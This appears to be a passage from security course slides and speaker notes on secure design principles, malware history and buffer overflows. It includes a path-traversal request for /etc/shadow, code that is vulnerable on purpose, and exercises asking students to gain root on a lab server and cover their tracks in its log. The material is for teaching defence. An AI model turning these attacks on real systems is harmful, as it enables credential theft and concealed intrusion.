Some people might look at security of your application (if they care) may or may not tell you what they find Closed: not making code available does not hide much need diverse security-aware code reviews A business decision: Not a security one! There are a plethora of companies that need to secure their software that might are aware of the “security by obscurity” problem, and decide to make their software “open-source” in order to secure it. When a company makes a piece of software “open-source,” it makes the source code available to the entire world for review. They reason that if a piece of software can only be made secure by subjecting it to an open review process, then why not make it open to the entire world such that people can point out problems, and the company can simply fix it. While the company might have good intensions, the company is making yet a more detailed set of assumptions if it believes that it can create more secure software by open-sourcing it. The first additional assumption that the company would be making is that by open-sourcing its software, others would actually look at the source code of the software, and specifically would look at the sections of code that might lead to security flaws. If the source code is hard to read, not very understandable, uninteresting, etc. the code will probably not be read at all. In addition, if an open-source developer actually does look at the code, he or she might be interested in looking at a piece of the code whose functionality they are interested in modifying for their own purposes. The open-source developer might want to change the GUI, or adapt some part of the functionality to serve a specific request that one of their customers might have. Security may or may not be on the agenda of the open-source developer. Finally, even if the open-source developer is interested in the security of the program, there is no assurance that he or she will actually report any security vulnerabilities to the author of the code. The open-source “developer” may be malicious and may be looking to attack some deployed version of the software in question. Due to all these reasons, the simple act of making a piece of software open-source will not automatically lead to an increase in its security. On the other hand, keeping a piece of software proprietary (“closed-source”) does not ensure the security of a program either for all the reasons that we discussed when we talked about in the security by obscurity section. Only releasing the binary code of an application does not hide much from the attacker, and the attacker can still exploit security holes by studying the behavior of the running program. Even if a company keeps its code proprietary, it should be reviewed by security experts to look for vulnerabilities. What this all means is that if you want to ensure the security of an application, you need to spend time reviewing the code for security vulnerabilities. You can’t simply open-source it in the hopes that others will find security flaws for you, and you can’t hope that it will be secure just because you don’t release the source code. You need to spend time reviewing the security of your application yourself if you indeed want it to be secure. So by open-sourcing a piece of software, one might argue that they could be just making the hacker’s job a little easier. This is possible, but a determined hacker doesn’t need to source code. This does not contradict what we said when we talked about security by obscurity. Hiding the source code of an application does not make it much harder to attack. At the end of the day, the decision to open-source a piece of software or keep it closed source should be a business decision. Is open-sourcing or keeping the code proprietary more complementary with the business model under which the software is intended to generate revenue? (Good discussion of this topic in “Building Secure Software” by John Viega and Gary McGraw.)

2.8. A Game of Economics All systems insecure: how insecure?
What is the cost to break system? Weakest link? For every $ that defender spends, how many $ does attacker have to spend? If (Cost to “break” system >> Reward to be gained) Then system is secure Otherwise system is NOT secure “Raise the bar” high enough Security is about risk management Another important thing to realize before embarking on the design of a secure system is that security can be viewed as a game of economics. In fact, all systems can be considered to be insecure, and the real question becomes how insecure. Specifically, the insecurity of an application can be measured by the expected cost that an attacker would need to spend to achieve his or her attack. This expected cost can be made up of the amount of time the attacker needs to spend, the materials and technology that the attacker would need to acquire, and the risk that the attacker thinks he or she might get caught. When we study applied cryptography in the next chapter, we will see that the amount of security that any particular cryptographic algorithm offers is partially a function of how many bits the secret key used with that algorithm is. For each additional bit of data in the key, the amount of time that an attacker may have to spend to attack the algorithm is multiplied by two. Another interesting question to look at from a security standpoint is: for every dollar that the attackee spends, how many dollars does the attacker need to spend? While it is interesting to think about security in these terms, it is typically hard to come up with quantitative numbers to answer these types of questions. Nevertheless, it is useful to pose these questions to help get our heads around the nature of the problem of security. In this view of the world where we consider all systems to be insecure, the next relevant question is what does it take to make sure that a system is “secure enough?” We might define “secure enough” to mean that the expected cost to break into the system is much greater than the potential reward to be gained by the attacker. If a system is “secure enough,” then there does not exist enough economic incentive for the attacker to break into the system. In chapters 6 through 8 of this course, we will study a number of defenses that one can employ to make a system “secure enough” against an “average” hacker. (Where average means that the attacker does not have any special vendettas or special rewards to break into your system.) The bottom line is that security is about risk management. How much technology does one need to employ to manage the risk that an attack might achieve its goals? If no technology is employed, the risk that an attack will be successful will be high. If some technology is employed, the risk that the “average” hacker will successfully mount an attack might be drastically reduced. In a lot of technology is employed (and it is targeted at addressing the most relevant threats, and there aren’t any physical or policy-oriented holes, etc.) then it is likely that all but the most sophisticated hackers will be able to successfully mount an attack and the risk is low.

2.8. Economics Example Two ways to break system with L-bit key
Brute-force search for key: costs C cents/try “Payoff” employee (earning S yearly for Y years, interest ) for the key: costs P = i=0Y SY-i dollars Brute-Force Total Cost: On average, try half the keys Cost = (C/2)(2L) = 2L-1C Ex: Say P=$5 million, L=64, C=3.4e-11, brute-force cost is > $300 million (better to payoff) Break-even point: 2L-1C = i=0Y SY-i

2.9. “Good Enough” Security
Alpha Version: security should be good enough Won’t have much to protect yet Difficult to predict types of threats But still set up a basic security framework, “hooks” Beta Version: throw away alpha Design in security to deal with threats discovered during testing

Summary Threats (DoS, Phishing, Infiltration, Fraud, …)
SimpleWebServer: Security by Obscurity Fails Economics Game (cost >> reward for attacker) “Good Enough” Security: Design Incrementally From Beginning In the previous chapter, we covered a number of high-level requirements that more secure systems strive to provide. In this chapter, we will discuss a number of design principles that security architects typically keep in mind when building secure systems.

CHAPTER 3 Secure Design Principles

Agenda Principle of Least Privilege
Defense-in-Depth & Diversity-in-Defense Secure the Weakest Link Fail-Safe Stance Secure by Default Simplicity & Usability We will now shift gears from talking about general high-level approaches and tradeoffs to talking about design principles.

3.1. Principle of Least Privilege
Just enough authority to get the job done. Common world ex: Valet Keys Valets can only start car and drive to parking lot Highly elevated privileges unnecessary Ex: valet key shouldn’t open glove compartment Web server Ex: can read, not modify, html file Attacker gets more power, system more vulnerable In the latter half of this chapter, we will focus on discussing a few well-known secure design principles. The first principle, the principle of least privilege, states that to ensure security in a system, a process should only be given access to the most limited set of resources necessary to accomplish its task. That is, a user or a computer program should only be given just enough authority to get his or her or its job done. A common every-day example of the principle of least privilege at work in the physical world is the use of valet keys. A valet is someone that parks your car for you when you arrive at a hotel or restaurant, and people give their car keys to valets so that they can do so. Most cars that you buy these days come with special valet keys, and valets are given valet keys to park cars. The valet key allows to valet to only start the car and drive it to its parking spot. The valet key does not give the valet access to open the glove compartment or the trunk, where valuables might be kept. The idea is to give the valet access to only those resources necessary to do his or her job of parking the car. If we were to attempt to design a valet key system for an automobile even better, we might limit the number of miles that could be driven with the valet key! Similarly, we should follow the same principle when designing our computer programs. If a web server is responsible for serving files to web users, the web server should only be given access to the set of HTML files that the web server is to server. By following this approach, if the web server is broken into, and the attacker is able to access a command shell the most that the attacker would be able to do is read the HTML files. Unfortunately, sometimes web servers are run with elevated privileges that gives them access to other parts of a file system as well, and are also given the ability to modify files (as some CGI-scripts may need to do so). A principle of least privilege approach would limit the amount of damage that an attacker might be able to do if the web server is limited in the privileges that it has. However, in the real-world, even if the web server is being run with limited privileges, there are typically so many vulnerabilities that attackers are able to determine ways to elevate the privileges of an account even if it only typically has the ability to just read files on a particular part of the file system. Nevertheless, this does not mean that we should not try to protect our systems by employing the principle of least privilege! Ex: Avoid setuid to root Another example of how attackers can infiltrate a system that does not correctly take advantage of the principle of least privilege is bad set-uid scripts. On UNIX systems, sometimes it is necessary to elevate the privilege of a process. For example, when a user wants to change her password, the “passwd” program that is used to do this must make changes to the system password file once it authenticates the user. The only user that typically has access to modify this file that contains all of the usernames and passwords of all the users in the system is the administrator. But in order for the passwd program to work, the passwd program itself must be given administrator privileges to change the password for the user’s account once the user is authenticated. The passwd program is said to have its uid, or user id, set to root (the administrator account) when it runs. That is, regardless of which user runs the passwd program, the program is executed with elevated privileges (that of root instead of the regular user) to do its job. While the passwd program is an example of a program that absolutely must be set-uid to root to get its job done, there are examples of other UNIX programs that had a set-uid to root that didn’t absolutely need this privilege. These programs violate the principle of least privilege and lead to security vulnerabilities. For example, old version of the “lpr” command in the UNIX system was used to print files, and could be told to delete a file after it was printed. The old version of this command used to be set-uid to root because the file would need to be copied to a special “print spool” directory owned by root. So, it was possible to abuse “lpr” to delete other people’s files. The way this would work is you provide the name of some other users file to lpr and you also tell it do delete the file. Since lpr runs with root privileges, it copies the file into the print spool directory, and then deletes it. The root account is allowed to delete any file, and so it does not matter that you may not be authorized to delete the other person’s file– when you run lpr, you are given elevated root privileges, and are allowed to do anything that lpr will let you. Had the principle of least privilege been followed in the original design of the lpr command, the command would not be set-uid to root. Instead, a separate user account would have been created for the express purpose of printing files. The print spool directory would be owned by that account. The lpr command would be rewritten such that it would execute in two sub-processes. Sub-process 1 would be set-uid to the print-spool account and copy the file to be printed into the print spool directory, and sub-process 2 would be the traditional rm command that only allows a user to delete his or her own file. Least privilege can minimize the damage that can result from an attack by a trojan horse.

3.1. SimpleWebServer Example
If SWS run under root account, clients could access all files on system! serveFile() method creates FileReader object for arbitrary pathname provided by user GET ../../../../etc/shadow HTTP/1.0 Traverses up to root, /etc/shadow on UNIX contains list of usernames & encrypted passwords! Attacker can use this to launch a dictionary attack Need to canonicalize and validate pathname Obey Least Privilege: Don’t run server under root!

3.1. Canonicalizing Pathnames
checkPath() method: ensure target path is below current path and no .. in pathname Then serveFile() uses normalized path: String checkPath (String pathname) throws Exception { File target = new File(pathname); File cwd = new File(System.getProperty("user.dir")); /* User's current working directory stored in cwd */ String targetStr = target.getCanonicalPath(); String cwdStr = cwd.getCanonicalPath(); if (!targetStr.startsWith(cwdStr)) throw new Exception("File Not Found"); else return targetStr; } fr = new FileReader (checkPath(pathname));

3.2. Defense-in-Depth Also called redundancy/diversity: layers of defense, don’t rely on any one for security Examples Banks: Security Guards, Bullet-Proof, Teller Window, Dye on Money Many different types of magic and many levels of defense protecting the Sorcerer's Stone in Harry Potter Banks: security guards (guns), bulletproof glass, cash with dye, …

3.2.1. Prevent, Detect, Contain, and Recover
Should have mechanisms for preventing attacks, detecting breaches, containing attacks in progress, and recovering from them Detection particularly important for network security since it may not be clear when an attack is occurring

3.2.2. Don’t Forget Containment and Recovery
Preventive techniques not perfect; treat malicious traffic as a fact, not exceptional condition Should have containment procedures planned out in advance to mitigate damage of an attack that escapes preventive measures Design, practice, and test containment plan Ex: If a thief removes a painting at a museum, the gallery is locked down to trap him.

3.2.3. Password Security Example
Sys Admins can require users to choose strong passwords to prevent guessing attacks To detect, can monitor server logs for large # of failed logins coming from an IP address and mark it as suspicious Contain by denying logins from suspicious IPs or require additional checks (e.g. cookies) To recover, monitor accounts that may have been hacked, deny suspicious transactions

3.3. Diversity-in-Defense
Using multiple heterogeneous systems that do the same thing Use variety of OSes to defend against virus attacks Second firewall (different vendor) between server & DB Cost: IT staff need to be experts in and apply to patches for many technologies Weigh extra security against extra overhead

3.4. Securing the Weakest Link
"Information System is only as strong as its weakest link.“ Common Weak Links: Unsecured Dial-In Hosts: War Dialers Weak Passwords: easy to crack People: Social Engineering Attacks Buffer Overflows from garbage input

Weak Passwords One-third of users choose a password that could be found in the dictionary Attacker can employ a dictionary attack and will eventually succeed in guessing someone’s passsword By using Least Privilege, can at least mitigate damage from compromised accounts

People Employees could fall for phishing attacks (e.g. someone calls them pretending to be the “sys admin” and asks for their password) Especially a problem for larger companies Malicious Programmers Can put back doors into their programs Should employ code review Keep employees happy, less incentive for them to defraud company Also distribute info on need-to-know basis, perform background checks on hires

3.4.3. Implementation Vulnerabilities
Correct Design can have bugs in implementation Misuse of encryption can allow attacker to bypass it and access protected data Inadvertent mixing of control and data Attacker feeds input data that’s interpreted as a command to hijack control of program Ex: buffer overflows, SQL injection

3.5. Fail-Safe Stance Expect & Plan for System Failure
Common world example: Elevators Designed with expectation of power failure In power outage, can grab onto cables or guide rails Ex: If firewall fails, let no traffic in Deny access by default Don’t accept all (including malicious), because that gives attacker additional incentive to cause failure If elevator power fails, they grip their cables by default. Let’s say that you are developing a client for a system that sends a password to an authentication server to check the password. If the authentication server is down, access to all clients should be denied by default.

SWS Fail-Safe Example public void serveFile (OutputStreamWriter osw, String pathname) throws Exception { FileReader fr=null; int c=-1; StringBuffer sb = new StringBuffer(); /* ...code excluded... */ while (c != -1) { sb.append((char)c); // if memory run out, crashes! c = fr.read(); } osw.write (sb.toString()); Crashes, but doesn’t do something insecure Still a bug since it can be used for DoS Attacker could use /dev/random, infinite length file

3.5.2. Checking the File Length
One fix: have a default maximum amount of data to read from file Only serve file if sufficient memory available Still doesn’t work for /dev/random, since it’s a special file whose length is reported as 0 (it doesn’t actually exist on disk) pathname = checkPath(pathname); // canonicalize File f = new File (pathname); /* ... */ if (f.length() > Runtime.getRuntime().freeMemory()) { throw new Exception(); }

3.5.3. Don’t Store the File in Memory
Instead of storing the bytes of the file before sending it, just stream it Problem: /dev/random causes server to be forever tied up servicing attacker’s request, can’t serve other legitimate requests (DoS still possible) while (c != -1) { osw.write(c); // No StringBuffer storage c = fr.read(); }

3.5.4. …and Impose a Download Limit
To properly defend against /dev/random attack, need to impose max download limit Tradeoff: limit too low, legitimate files get truncated; limit too high, DoS still a threat from abusive requests while ((c != -1) && (sentBytes < MAX_DOWNLOAD_LIMIT)) { osw.write (c); sentBytes++; c = fr.read(); }

3.6. Secure By Default Only enable 20% of products features that are used by 80% of user population “Hardening” a system: All unnecessary services off by default More enabled features means more potential exploits and decreased security Example: Windows OS all features turned on to make users hooked there were lot of viruses like Code Red and Nimda which exploited IIS vulnerability For example, Windows traditionally ships with many (network) services on by default (i.e, IIS!). Vulnerabilities become available to attackers immediately after the system is installed and set up! To prevent this, create a “hardened” version of your system, and new installations should be made based on the “hardened” version.

3.7. Simplicity Security holes likely in complex software
Simpler design is easier to understand and audit Choke point: centralized piece of code through which all control must pass keeps security checks localized, easier to test Less functionality = Less security exposure

3.8. Usability Usable = users can easily accomplish the tasks they need to do with the software Don’t rely on documentation: enable security features by default, design to be easy to use Difficulty is in tradeoff with user convenience Users are lazy (They ignore security dialogs) Prevent users from committing insecure actions, assist them in doing it securely “Why Johnny Can’t Encrypt” – “usability for security” Usability: when to *use* security features? User’s don’t know what they need: stock quote example: users might say that they just want their quotes fast and don’t want them to be encrypted (i.e., since the information is public anyway), but a bad guy might change the content and force people to do trades they wouldn’t want to do otherwise since few people will actually double check the stock quote info.

3.8. Usability for Security
Definition: (Whitten-Tygar) Security software is usable if the people who are expected to use it: are reliably made aware of security tasks they need to perform are able to figure out how to successfully perform those tasks do not make dangerous errors are sufficiently comfortable with the interface to continue using it Need to come up with a compelling example.

3.9. Security Features Do Not Imply Security
Using one or more security algorithms/protocols will not solve all your problems! Using encryption doesn’t protect against weak passwords. Using SSL doesn’t protect against buffer overflows. Schneier: “Security is a process, not a product!” Can never be completely secure, just provide a risk assessment (more testing lessening risk) Attacker only needs to find one flaw, designers have to try and cover all possible flaws Security features can help, but can’t stop bugs

Summary Employ a few key design principles to make system more secure.
Avoid elevated privileges Use layered defense (prevention, detection, containment, and recovery) Secure weakest links Have fail-safes, i.e. crash gracefully Don’t enable unnecessary features Keep design simple, usable Security features can’t compensate for bugs In the previous chapter, we covered a number of high-level requirements that more secure systems strive to provide. In this chapter, we will discuss a number of design principles that security architects typically keep in mind when building secure systems.

CHAPTER 4 Exercises for Part 1

Conceptual Exercises Are there dependencies between any of the security concepts that we covered? For example, is authentication required for authorization? Why or why not? What happens if a client connects to SimpleWebServer, but never sends any data and never disconnects? What type of an attack would such a client be able to conduct?

Programming Problem (1)
HTTP supports a mechanism that allows users to upload files in addition to retrieving them through a PUT command. What threats would you need to consider if SimpleWebServer also had functionality that could be used to upload files? For each of the specific threats you just listed, what types of security mechanisms might you put in place to mitigate the threats?

public void storeFile (BufferedReader br, OutputStreamWriter osw, String pathname) throws Exception { FileWriter fw = null; try { fw = new FileWriter(pathname); String s = br.readLine(); while (s != null) { fw.write(s); s = br.readLine(); } fw.close(); osw.write("HTTP/ Created"); } catch(Exception e) { osw.write("HTTP/ Internal Server Error"); public void logEntry(String filename,String record) { FileWriter fw = new FileWriter (filename, true); fw.write(getTimestamp()+ " " + record); public String getTimestamp() { return (new Date()).toString(); Modify the processRequest() method in SWS to use this file storage and logging code.

Run your web server and mount an attack that defaces the index.html home page. Assume that the web server is run as root on a Linux workstation. Mount an attack against SimpleWebServer in which you take ownership of the machine that it is running on. By taking ownership, we mean that you should be able to gain access to a root account, giving you unrestricted access to all the resources on the system. Be sure to cover your tracks so that the web log does not indicate that you mounted an attack.

Conceptual Exercises Are there dependencies between any of the security concepts that we covered? For example, is authentication required for authorization? Why or why not? What happens if a client connects to SimpleWebServer, but never sends any data and never disconnects? What type of an attack would such a client be able to conduct?

HTTP supports a mechanism that allows users to upload files in addition to retrieving them through a PUT command. What threats would you need to consider if SimpleWebServer also had functionality that could be used to upload files? For each of the specific threats you just listed, what types of security mechanisms might you put in place to mitigate the threats?

public void storeFile (BufferedReader br, OutputStreamWriter osw, String pathname) throws Exception { FileWriter fw = null; try { fw = new FileWriter(pathname); String s = br.readLine(); while (s != null) { fw.write(s); s = br.readLine(); } fw.close(); osw.write("HTTP/ Created"); } catch(Exception e) { osw.write("HTTP/ Internal Server Error"); public void logEntry(String filename,String record) { FileWriter fw = new FileWriter (filename, true); fw.write(getTimestamp()+ " " + record); public String getTimestamp() { return (new Date()).toString(); Modify the processRequest() method in SWS to use this file storage and logging code.

Run your web server and mount an attack that defaces the index.html home page. Assume that the web server is run as root on a Linux workstation. Mount an attack against SimpleWebServer in which you take ownership of the machine that it is running on. By taking ownership, we mean that you should be able to gain access to a root account, giving you unrestricted access to all the resources on the system. Be sure to cover your tracks so that the web log does not indicate that you mounted an attack.

CHAPTER 5 Worms and Other Malware

Agenda Worms spreading across Internet through vulnerabilities in software History of Worms Morris Worm Code Red Nimda Blaster & SQL Slammer Rootkits, Botnets, Spyware, and more Malware

5.1. What Is a Worm? Virus: program that copies itself into other programs Could be transferred through infected disks Rate dependent on human use Worm: a virus that uses the network to copy itself onto other computers Worms propagate faster than viruses Large # of computers to infect Connecting is fast (milliseconds) First, what we are going to do is survey some of the most popular and serious viruses and worms that have wreaked havoc by taking advantage of buffer overflow vulnerabilities in widely deployed programs. For the purposes of this course, we define a virus as a computer program that is capable of making copies of itself, and inserting those copies into other programs. Viruses may make copies of themselves onto other programs stored on a computers hard disk or onto floppy disks inserted into the computer. A worm is a virus that may be capable of not only making copies of itself into other programs on hard or floppy disks attached to a particular computer, but are capable of using a computer network to make copies of itself onto other computers (and/or the disks attached to other computers). While computer viruses are a serious threat, the amount of damage they can cause is limited by the number of floppy disks that are infected, and then inserted into other computers. On the other hand, worms spread much more quickly than viruses since a computer infected with a worm can constantly make connections to other computers anywhere on the network and infect them. More info in “White-Hat” Security Arsenal by Avi Rubin.

5.2. An Abridged History of Worms
Examples of how worms affect operation of entire Internet First Worm: Morris Worm (1988) Code Red (2001) Nimda (2001) Blaster (2003) SQL Slammer (2003)

5.2.1. Morris Worm: What It Did
Damage: 6000 computers in just few hours Extensive network traffic by worm propagating What: just copied itself; didn’t touch data Exploited and used: buffer overflow in fingerd (UNIX) sendmail debug mode (execute arbitrary commands such as copying worm to another machine) dictionary of 432 frequently used passwords to login and remotely execute commands via rexec, rsh The first computer worm ever built was the Morris worm (named after Robert Morris). When Robert Morris first deployed his worm, it was able to infect over 6000 computers within just a few hours, at a rate of hundreds of computers a minute. A computer virus would spread much slower since new computers could only be infected at the rate at which floppy disks are inserted into infected computers, and then used in uninfected computers. The rate at which a computer virus can spread would thus be much lower than hundreds per minute because the virus requires the help of the human operator to spread from one computer to another. However, a worm, such as the Morris worm, was able to spread very quickly because it did not need the assistance of a human operator. Instead, as long as an infected computer is connected to the network, the infected computer could contact other uninfected computers on the network and spread to them. So what did the Morris worm do? Well, luckily, all that it did was make copies of itself to other computers on the network. But that in itself was enough to cause significant damage. The amount of network traffic that was generated by the worm scanning for other computers to infect was significant. The effort required by systems administrators to determine if a particular computer was infected, and to remove it was also significant. How did the Morris worm work? What it would do once it started running, was scan the files /etc/hosts.equiv and /.rhosts to find other machines to attack. Then it would try it remote login to some of these hosts as one “vector” (or method) of its attack. The Morris Worm has a dictionary of 432 of “common” passwords that it would try to use to break into user accounts. However, if the worm could not directly remotely login into other hosts, it would use two additional “vectors” of attack. The first was a buffer overflow vulnerability in fingerd, and the second was a bug in the sendmail program that is used to route in UNIX. We will talk about buffer overflow vulnerabilties later this this course. The particular buffer overflow vulnerability that the Morris worm took advantage of was one in a program called fingerd that is installed on UNIX systems. Finger is a program that let’s you check whether or not a particular user is logged in, and fingerd is a “finger daemon server” that is installed on all UNIX systems. The Morris worm leveraged the fact that fingerd is installed on all UNIX systems to help propagate from one UNIX machine to the next. The second vulnerability based upon a programming bug (also in the sendmail program). The sendmail program is used to route s from one UNIX host to another, and it had a debugging “feature” that Morris took advantage of to remotely execute code on another machine. Of course, the debugging mode should have been disabled on production UNIX systems, but the fact that it wasn’t highlights a problem that is still around today– making sure that systems are correctly configured to run securely.

5.2.2. The Morris Worm: What We Learned
Diversity is good: Homogenity of OSes on network -> attacker can exploit vulnerabilities common to most machines Large programs more vulnerable to attack sendmail was large, more bug-prone fingerd was small, but still buggy Limiting features limits holes: sendmail debug feature should have been turned off Users should choose good passwords: dictionary attack would have been harder Aside from the technical details of the worm and how it worked, we learned a number of other lessons from the Morris worm. Diversity– if all the computers run the same operating systems, they have all the same operating system vulnerabilities. Complexity– writing bug-free software is hard. The more lines of code, the more bugs. The more bugs, the more the likelihood that one of the bugs can result in an exploitable security vulnerability. Good passwords will minimize the effectiveness of dictionary attacks. CERT: Computer Emergency Response Team What if the Morris worm did do something serious? Would shutting down servers be a good idea?

The Creation of CERT Computer Emergency Response Team (CERT) created due to damage and disruption caused by Morris worm Has become a leading center on worm activity and software vulnerability announcements Raises awareness bout cyber-security

5.2.4. The Code Red Worm (1) Exploited
Microsoft IIS web server buffer overflow “indexing server” feature: randomly scanned IP addresses to connect to other IIS servers Spread rapidly: > 2,000 hosts/min Evaded automated detection Detectable more easily by humans than scanners Resident only in memory, no disk writes Defaced home page of infected server

The Code Red Worm (2) Web server defaced by Code Red

The Nimda Worm Propagation vector: method by which worm spreads to another machine Payload: data worm carries as it travels Spread Rapidly, made Code Red worse Used multiple propagation vectors Spread from server to server (as in Code Red) But also from server to client (browser downloading infected file also became infected) Infected client sent s with worm code as payload

5.2.6. Blaster Worm Exploited Caused infected machine to shut down
buffer overflow in Microsoft OS: attacked Distributed Component Object Model service Patch deployed but many users didn’t download it Caused infected machine to shut down Issued a DDoS attack against Windows Update website to prevent users from getting the patch

Blaster Worm System shutdown Dialog by Blaster Worm

5.2.6. SQL Slammer Worm Exploited another buffer overflow
Took a single 376-byte UDP packet UDP connectionless -> spread quickly Infected 75,000, 90% w/in 10 mins. Attacked Microsoft SQL Server DB App Disabled server, scanned random IPs to infect Impact Excessive traffic due to the worm propagating caused outages in 13,000 BofA ATMs Airlines were cancelled & delayed

5.3. More Malware Rootkits: imposter OS tools used by attacker to hide his tracks Botnets: network of software robots attacker uses to control many machines at once to launch attacks (e.g. DDoS through packet flooding, click fraud) Spyware: software that monitors activity of a system or its users without their consent

5.3. More Malware Keyloggers: spyware that monitors user keyboard or mouse input, used to steal usernames, passwords, credit card #s, etc… Trojan Horses: software performs additional or different functions than advertised Adware: shows ads to users w/o their consent Clickbots: bot that clicks on ads, leads to click fraud (against cost-per-click or CPC ad models)

5.3. Distributing Malware1 Most malware distribution through drive-by downloads (i.e. automatic installation of binary when visiting website) Uses pull-based model (e.g. links) Maximizes exposure by getting as many links as possible to malware distribution site Search engines such as Google mark pages as potentially malicious to prevent 1 Source: N. Provos et. al. “The Ghost in the Browser: Analysis of Web-based Malware”

5.3. Clickbot.A Botnet2 (1) Over 100,000 machines, HTTP-based botmaster Conducted low-noise click fraud against syndicated search engines Syndication: get feeds of ad impressions Sub-Syndication: partner with a syndicated engine All get a share of revenue from click Only 7/24 anti-virus scanners detected it in 5/06 IE browser helper object (BHO) Capable of accessing entire DOM of web pages Written in PHP with MySQL backend

5.3. Clickbot.A Botnet1 (2) Used doorway-sites (w/ links for bots to click) posing as sub-syndicated search engines Fine-grained control for botmaster Low noise: set maxclicks bots could do to 20 Used redirectors & several layers below major search engine (harder to detect/track) 2 Source: N. Daswani et. al. “The Anatomy of Clickbot.A”

Summary Worms propagate rapidly, exploit common vulnerabilities and cause widespread damage Prevention Eliminate Buffer Overflows (Programmers) Don’t open attachments (Users, SAs) Disable unnecessary functionality (Users, SAs) Patch systems regularly (SAs) Detection Update scanners with latest definitions Use auto-updating scanners when possible Employ programs such as Tripwire (SAs) There are various things that programmers, systems admins, and users can do. Progs eliminate buffer overflows Users should not open attachments. Sys admins can auto-strip attachments. Sys admins and users can disable unnecessary funcationlity. And use firewalls to restrict access to ports that shouldn’t be used and may be vulnerable.

CHAPTER 6 Buffer Overflows

Agenda Buffer overflows: attacker hijacks machine
Attacker injects malicious code into program Preventable, but common (50% CERT advisories decade after Morris Worm) Fixes: Safe string libraries, StackGuard, Static Analysis Other Types of Overflows: Heap, Integer, … Buffer overflow: Dejavu all over again Up to 50 percent of today's widely exploited vulnerabilities are buffer overflows, according to an analysis by David Wagner, Jeffrey Foster, Eric Brewer, and Alexander Aiken in a paper presented at this year's Network and Distributed Systems Security conference (NDSS2000). Furthermore, the analysis suggests that the ratio is increasing over time. The data are extremely discouraging since the buffer overflow problem has been widely known in security circles for years. For some reason, developers have not readily moved to eliminate buffer overflows as the leading pitfall in software security. Number of vulnerabilities resulting in CERT/CC advisories for the last eleven years In chart above, the number of vulnerabilities that can be directly attributed to buffer overflows is displayed. As the data show, the problem is not getting any better. In fact, buffer overflows are becoming more common.

6.1. Anatomy of a Buffer Overflow
Buffer: memory used to store user input, has fixed maximum size Buffer overflow: when user input exceeds max buffer size Extra input goes into unexpected memory locations So before we define what a buffer overflow vulnerability is, let’s first clarify what we mean by a “buffer.” A buffer is simply a memory location that can be used to store user input. Very often, buffers have a fixed maximum size. If the user provides more input than can fit in the buffer, the extra input might end up in places in memory that we do not expect, and the buffer is said to overflow. Let’s look at a simple example of a buffer, and how a buffer overflow can occur. (Insert picture of spilled milk.)

A Small Example Malicious user enters > 1024 chars, but buf can only store 1024 chars; extra chars overflow buffer void get_input() { char buf[1024]; gets(buf); } void main(int argc, char*argv[]){ get_input(); Consider the example of the program on this slide. We will see that this program is vulnerable to a buffer overflow attack. In this slide, we have shown a very simple program written in the C programming language. In the main function of this small program, the get_input() function is called to accept input from the user. The get_input() function has a variable called “buf” that it uses to store up to 1024 bytes of input from the user. The gets() function simply makes a call to the operating system to tell it to accept input from the user until the user hits the carriage return and to store that input in the “buf” variable. The “buf” variable effectively stores a “buffer” that holds the user input. What makes this program vulnerable to a buffer overflow attack is that, while most users will not enter input that exceeds 1024 characters, a malicious user might enter more than 1024 characters before hitting the carriage return. The problem is that the “buf” buffer variable has only been allocated 1024 bytes of memory. So, what happen to any extra input that a malicious user might enter? Well, in a perfect world, that extra input might just get ignored, or the gets() function might return with an error, or perhaps even the program would be halted by the operating system. Unfortunately, in the real world, because of the way that the gets() function is written in the standard C library, something much worse can happen. However, the simple example program on this slide does not do much to begin with, so lets look at a program whose functionality is a bit more significant.

6.1.2. A More Detailed Example
1 int checkPassword() { 2 char pass[16]; 3 bzero(pass, 16); // Initialize 4 printf ("Enter password: "); 5 gets(pass); 6 if (strcmp(pass, "opensesame") == 0) 7 return 1; 8 else 9 return 0; 10 } 11 12 void openVault() { 13 // Opens the vault 14 } 15 16 main() { if (checkPassword()) { openVault(); printf ("Vault opened!"); } 21 } checkPassword() In this slide, we have a slightly more complicated example. The program on the left contains three functions: main, openVault, and checkPassword. The program’s purpose in life is to allow a user to enter a password, and if the user enters a correct password, the program calls the openVault function. In a real program, you can imagine that the openVault function might issue a command that really opens a bank vault, or dispenses cash out of an ATM machine, or does some other security critical operation based on the password check. The way the program works is that the main() function calls the checkPassword function to allow the user to enter a password. The checkPassword function returns the value 1 if the user enters the correct password, which, in this case, is the string “opensesame.” However, if the user does not enter a correct password, the checkPassword function returns 0. Looking back at the main() function if the checkPassword function returns a non-zero value (like 1), it calls the openVault function. While the code looks reasonable, it is vulnerable to a buffer overflow attack. Because of this vulnerability, it is possible for an attacker to have the openVault function called without entering the correct password. To understand why, first notice that a buffer of 16 bytes called “pass” has been allocated to allow the user to enter the password, and the same gets() function that we saw in the previous slide is being used to fill that buffer. Second, let’s think about what goes on at the machine level when one function calls another. Microprocessors use the concept of an execution stack to keep track of what they are doing at any particular time. The way a normal execution stack would look for our program on the left is illustrated in the middle box of the slide. When the program starts running, the address of the main() function is “pushed” onto the top of an execution stack. Then, we the main program calls the checkPassword() function, the checkPassword function is pushed onto the top of the stack. The microprocessor does this so that when it finishes executing the checkPassword function, it knows that it needs to jump back to executing the main() function. We have denoted the address of the main function by the “&main.” Since the checkPassword function also uses the “pass” buffer, space for that buffer is also allocated on the execution stack, and the space for the pass buffer is allocated right on top of the return address for the main function – the &main. If the user enters a password that is less than 16 characters, then all is well and good. However, if the user is malicious, and enters a password that is more than 16 characters, then the extra characters end up overwriting the return address for the main function. How bad is that? Very bad,a ctually. What this allows a malicious user to do is enter a password that is more than 16 characters in such a way that the return address for main could be overwritten with another return address! The malicious user does not care what are the first 16 characters he enters is, but he does care about what the 17 through 20th character is. Assuming that the return address is 4 bytes, the malicious user can construct an input that has is 17 throgh 20th characters that corresponds to the address of another function of the program. If the malicious user can determine what the address of the openValut function is, he can enter a “password” that has the address of the openVault function in it, and he doesn’t ever need to know the real password to get the program to jump to it. Once the user enters the malicious input that is a string that contains the return address, what will happen is that the string comparison against “opensesame” will fail, and the check password function will return 0 BUT the program will NOT return to the main function– it will return to the openValut function!!! A diagram of a compromised stack, in which the malicious user has entered a password that contains the return address of the openVault function is shown. It turns out that figuring out the address of the openValut function is relatively easy given a binary of the program. In the class exercise associated with this lecture, you will be given the opportunity to actually construct a buffer overflow attack, but for right now, it is most important to understand that by overflowing a buffer, a malicious user can cause a program to jump to a function of his or her choice instead of having the program continue its “normal” execution flow. So the next question is how do we fix the problem? We could just make the buffer larger. But then a malicious user could simply enter more input. A better solution would be to check the size of the input. Unfortunately, the gets() C function that is used to get the user’s input doesn’t really allow us to check the size of the input, or provide a maximum limit. So, we can replace the call to gets() with a call to another function called 